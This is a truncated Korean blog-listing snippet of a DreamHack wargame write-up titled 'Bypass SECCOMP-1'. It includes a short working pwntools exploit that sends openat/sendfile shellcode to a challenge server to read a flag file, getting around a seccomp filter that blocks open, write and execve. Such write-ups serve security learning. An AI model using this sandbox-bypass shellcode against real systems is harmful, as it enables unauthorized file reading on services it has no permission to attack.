목록seccomp (1)
Bypass SECCOMP-1
해당 내용은 로드맵에 있는 문제로 새로운 방법을 알게 되어 포스팅을 했다. exploit code from pwn import * context.arch = 'x86_64' p = remote('host1.dreamhack.games' , 8982) shellcode = shellcraft.openat(0, "/home/bypass_syscall/flag") shellcode += shellcraft.sendfile(1, 'rax', 0, 0xffffffff) p.sendline(asm(shellcode)) p.interactive() 해당 문제는 sandbox seccomp가 걸려있다. open, write, exceve함수는 사용할 수 없다. 그래서 비슷한 함수인 openat, sendfile을 사용..
wargame/DreamHack
2022. 2. 7. 21:41